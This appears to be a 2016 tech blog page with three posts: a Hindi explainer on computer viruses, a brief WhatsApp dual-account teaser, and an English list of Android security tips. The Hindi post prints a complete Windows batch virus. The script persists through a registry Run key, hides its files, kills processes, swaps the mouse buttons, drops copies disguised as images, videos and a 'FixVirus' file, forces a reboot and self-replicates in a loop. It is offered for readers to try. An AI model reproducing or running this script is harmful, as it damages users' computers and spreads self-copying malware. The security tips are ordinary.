Monday 5 December 2016

कंप्यूटर वायरस किया हे ?

वायरस 

     दिन ब दिन कंप्यूटर और  मोबाइल का बेबहार बढ़ता जगह हे।  तो ऐसे में  बहत सारा कंपनी ने ग्राहक को आक्रसित करेने केलिए नये नये  सॉफ्टवेर भी बनाने लगे हे । एक सॉफ्टवेर के पहले चरण को प्रोग्राम कहते हे । तो बहत सारा प्रोग्राम मिल कर एक सॉफ्टवेर बनता हे । तो ऐसे सॉफ्टवेर बनाने से हमारी रोजमरा की कार्य बहत आसान हो जाता हे । 
    
    लेकिन दोस्तों कई लोग ऐसे भी हे जो प्रोग्राम तो बनाते हे लेकिन ओ प्रोग्राम कंप्यूटर और मोबाइल को बिगड़ने केलिए होता हे । उसी प्रोग्राम को वायरस बोलते हे । 

सॉफ्टवेर और वायरस में किया अंतर हे ?

  जैसे की हमारी सरीर चलने केलिये जान चाहिए उसी  तहरा कंप्यूटर और मोबाइल हार्डवेयर को चलने केलिए सॉफ्टवेर की जरुरी हे । जैसेकी हमारे सरीर को बीमारी होता हे उसी तहरा कंप्यूटर भी वायरस की चपटे में आताहै । तो कैसे जाने फरक सॉफ्टवेर और वायरस के बिच में ? आईये जानते हे-


  सॉफ्टवेर :-

      सॉफ्टवेर कंप्यूटर चलने में मदद करता हे और हमारा बहत सारा काम को आसान बनाता करता हे । 
  सॉफ्टवेर चलने से कंप्यूटर को नुकसान नही होता हे । 

वायरस:-

      वायरस कंप्यूटर में चलरही सॉफ्टवेर को खराप करलेता हे और धीरे धीरे सरे कम्युटर को नाकाम करलेता हे । कंप्यूटर हैंग होना, सॉफ्टवेर चलाने में परिसनि  आना बार बार कंप्यूटर अपने आप चलना और बंद होना वायरस का लख्यन हे ।   

 कुछ वायरस का नाम :

    इल्वयू (iloveyou )

    कोड रेड (code red )

    मेलिसा (melissa )

    ससर (sasser )

    ज़ीउस (zeus )

    कॉन्फिकेर (conficker )

   स्टक्सनेट (stuxnet )

   मैडूम (mydoom )

   करयप्टोलोकेर (cryptolocker )

   फ्लैशबैक (flashback )

वायरस प्रोग्राम :-

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
 

इये सेफ अप्प के जानने केलिए। 

अगर इये पोस्ट आपको अछा लगा तो लईक कीजिये, शेयर और सब्सक्राइब कीजिये ।

    


  

    

                                          

Sunday 4 December 2016

How to use more than one whatsapp in single mobile?

How to use more than one whatsapp in single mobile?

WhatsApp is one of the most popular and commonly used Instant messaging apps these days and due to its simplicity and Easy to Use interface, users are able to use it without any hassle.
If you run dual SIM in your mobile phones, you might be willing to enjoy two separate WhatsApp account for your two different telephone numbers. Isn't it?

However, this is where WhatsApp puts limitations on its users. WhatsApp users can not use more than one WhatsApp account on their mobile devices.
Today, I am introducing you not one but multiple solutions to your problem that will allow you to run two WhatsApp accounts in one phone.
 
 

 

10 tips to protect your anroid device.

10 tips to protect your android device.

Smartphones have come to define us by being the portal to our online identity and as such should be treated with care and secured against any wrongdoing online (hacking) or offline (stolen). If you are not careful, losing your smartphone may mean more than just a loss in contacts and phone numbers. We’re talking about your social media accounts, your synced files, important documents, your emails, photos and messages.

Your entire information is traceable and downloadable and may be shared all over the World Wide Web if you are not careful enough.

While we’d love it if people don’t mess around with other people’s personal information, putting morale aside, this is the virtual world where thieves and hackers hide behind anonymity and are hard to trace. There is no one better to protect your own data, than you. We hope these tips and tricks will be of help in that endeavor.

1. Do Not Save All Of Your Passwords

 Many users tend to save their passwords to online services and sites on their device, never once thinking about what it would mean to a person who got their hands on the phone. Avoid having all important passwords saved in your device particularly when it comes to banking or payment apps.

2. Use Android In-built Security

If you are running on Jelly Bean, you can have a screen lock and encryption enabled to further enhance your security. There are many types of screen locks available for you to choose from such as password, pin, pattern and face unlock, available in your Android settings. Even when setting pins or pattern locks, try not to make it easy for hackers to guess your password.

3. Lock Your Apps

It is necessary to lock your apps, especially the ones holding private information that you wish nobody but you could see. This is a second layer of security to prevent anyone from using your lost device particularly if they have managed to bypass your locked Android.
You can use a free app like App Lock for this exact purpose. The idea here is not to lock every single app in your device, just really data-laden ones like your email apps or file managers.
While you at it, avoid using a combination of a pin or pattern lock that can be traceable from the smudges of your screen (Yes, it is traceable).

4. The importance of app permissions

Before you begin installing an app from Google Play, a list of requested permissions will pop up to show you what permission the app requires. Apps require permissions to do things but not all of them are necessary.Always read through the permissions to make sure they make sense and correspond to what the app actually does eg. an alarm app does not require a permission to access your text messages. This is a real important step because not all apps in the Play Store are safe. you have install app for trusted vendor.While you’re at it, make it a habit to read the comments as well as the rating of the app that you are going to download. This helps you understand more about what the app really does without trying it out firsthand.

5. Securing Your Network

One of the most important thing in protecting your Android is to secure your network. Try to avoid using public WiFi whenever you want to do something important like doing your banking online. As long you are sharing the same network with the public, they can easily sniff out your packets and translate it into actual data of your private information i.e. your passwords.
You can protect your information by using apps like Hideninja VPN so that your outgoing connection is always encrypted, making it harder for anyone to sabotage your data. If you suspect that your device is being attacked, WiFi Protector can help fend off these attackers. To further enhance your network security you can apply settings from SecDroid but note that this app is only for rooted phones.

6. Use Mobile Security App

It will make your job easier to have an app that handles most of your security issue. Find a mobile security app that you are comfortable using, for example: Lookout Security & Antivirus and avast! Mobile Security. Even with a security app, you shouldn’t let your guard down as Android malware is getting stronger and more rampant, which brings us to the next tip.

7. Create Multiple User Account To Protect Privacy

If you own an Android tablet and have to share it with a sibling, a spouse, or your kids, having multiple user accounts will help each of you protect your privacy. In Jelly Bean for tablet, there is an option for you to create multiple user accounts. You can create another general account for anyone who wants to use your device. The option is under the Settings > Users section.

8. Prepare A Backup Of Your Data

A backup of your precious data is a must-have in the day and age of smartphones. Picture the worst case scenario where your Android device has been stolen or hacked. The last thing you can do is perform a remote wipe (see #10). Without a backup, you will lose all your information in your device.
Even if you could retrieve your stolen phone, chances are that hackers that have managed to access your device will render it useless. If you have a backup however, you can still restore your Android device back to its original state. You can choose to backup important information to the Cloud, your desktop or even to a flash drive, for insurance.

9. Track Your Lost Device

So you have a backup already but you really want to get your lost device back. Well, as the smartphone industry would have it, your phone is built to be trackable, via GPS. The catch is, you have to enable GPS on your phone for it to be tracked. Fret not because, there are plenty of device-tracking apps for Android that can help you locate your lost or stolen device, some can even turn on the GPS on your phone remotely.

10. Enable Remote Wipe

So you are at the point where you have everything installed and ready to go. But, you still need one last feature – the ability for you to wipe your device remotely. This is necessary, especially when you are sure that your Android is lost (forever). There’s no crying over spilt milk now – we can only prevent them from turning it into cheese.
I recommend 3CX Mobile Device Manager because it is free and easy to use. You can sign up for the account here and let just hope that the day you need to use their remote wipe feature will never come.